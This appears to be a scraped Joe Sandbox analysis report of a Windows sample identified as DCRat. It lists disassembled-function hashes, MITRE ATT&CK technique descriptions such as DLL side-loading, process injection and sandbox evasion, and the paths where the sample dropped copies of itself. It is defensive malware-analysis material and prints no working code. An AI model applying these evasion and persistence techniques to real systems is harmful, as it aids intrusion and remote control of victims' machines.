Function 00007FFB4B45640B Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.2224747709.00007FFB4B452000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B452000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffb4b452000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be9f2a89b453027800fbf32ec3dfbddc53501c97035bc98f27eb7cd2a29f143b
Instruction ID: 3fd391980fbbe2a976760f58b8e35d92bf24c3c37f7d8b70198ace206daf070f
Opcode Fuzzy Hash: be9f2a89b453027800fbf32ec3dfbddc53501c97035bc98f27eb7cd2a29f143b
Instruction Fuzzy Hash: 453161B1A1C95A9FD748EF68C5919ACB7A1FF59340B508539D20DD3692CF34BC12CB80

Function 00007FFB4B457FB0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.2224747709.00007FFB4B452000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B452000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffb4b452000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e08b503c03c38f760c6baa16c679fdfb2bd400dea7461b0c1662f0db48426ffb
Instruction ID: 8726e1bf264193c30c1e484b560cb9e47920fd57ec8465bf34584eff699f94c9
Opcode Fuzzy Hash: e08b503c03c38f760c6baa16c679fdfb2bd400dea7461b0c1662f0db48426ffb
Instruction Fuzzy Hash: 7211EB5091CC668EF628FA24C954DB47351FB50721B15CD79C34B8749ACC2CB9C1D7A0

Function 00007FFB4B456EAE Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.2224747709.00007FFB4B452000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B452000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffb4b452000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fd19256aa8e305ce3837eb3e4b23bae93f8b40d69ec54659dd3af0081668174
Instruction ID: e438eb9c1cf45e0960cb30e1bdc5ae68da677b3c2243c9d0aaee0210936eb8dc
Opcode Fuzzy Hash: 6fd19256aa8e305ce3837eb3e4b23bae93f8b40d69ec54659dd3af0081668174
Instruction Fuzzy Hash: D011883160D94A8FEB0AAE38C8006E57390EF61350F04457EDA0DC71E2CA29A849C7A0

Function 00007FFB4B456519 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.2224747709.00007FFB4B452000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B452000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffb4b452000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84ec95045b1db48ef7778097cd0812afe2919a92ec61b2b96053b8209970ba8f
Instruction ID: fea824ac5d348896fc2efcfb6fbe00aaf0f3a838ca52e2fba3e79944338c041e
Opcode Fuzzy Hash: 84ec95045b1db48ef7778097cd0812afe2919a92ec61b2b96053b8209970ba8f
Instruction Fuzzy Hash: 69012671A0C9584FDB49FFB8D8515ECBBB0EF4A350F0444BED20DC3193C92958028710

Function 00007FFB4B4556B2 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000002.2224747709.00007FFB4B452000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B452000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_7ffb4b452000_JPOyDhPFIytu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ca3f9046d39339b8e5ff17d52b9f73a48a7391c57f13fc79de99cc72c071b9f
Instruction ID: 47abe9b60eabcea83bcc0c6be4f31e5ab1d45dec65a37bb617b4ea57bc45aa62
Opcode Fuzzy Hash: 6ca3f9046d39339b8e5ff17d52b9f73a48a7391c57f13fc79de99cc72c071b9f
Instruction Fuzzy Hash: 76F06D7185E6C69FD706EF70C9259E97FB4AF42310F1840E6D24A8B0B2D92D1A1AC761

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report yQrCGtNgsf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Microsoft.NET\RedistList\599871f56ea49f

C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe

C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe:Zone.Identifier

C:\Program Files\Adobe\Acrobat DC\599871f56ea49f

C:\Program Files\Adobe\Acrobat DC\JPOyDhPFIytu.exe

C:\Program Files\Adobe\Acrobat DC\JPOyDhPFIytu.exe:Zone.Identifier

C:\Program Files\Uninstall Information\599871f56ea49f

C:\Program Files\Uninstall Information\JPOyDhPFIytu.exe

C:\Program Files\Uninstall Information\JPOyDhPFIytu.exe:Zone.Identifier

C:\Recovery\599871f56ea49f

C:\Recovery\JPOyDhPFIytu.exe

C:\Recovery\JPOyDhPFIytu.exe:Zone.Identifier

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\JPOyDhPFIytu.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\yQrCGtNgsf.exe.log

Windows Analysis Report
yQrCGtNgsf.exe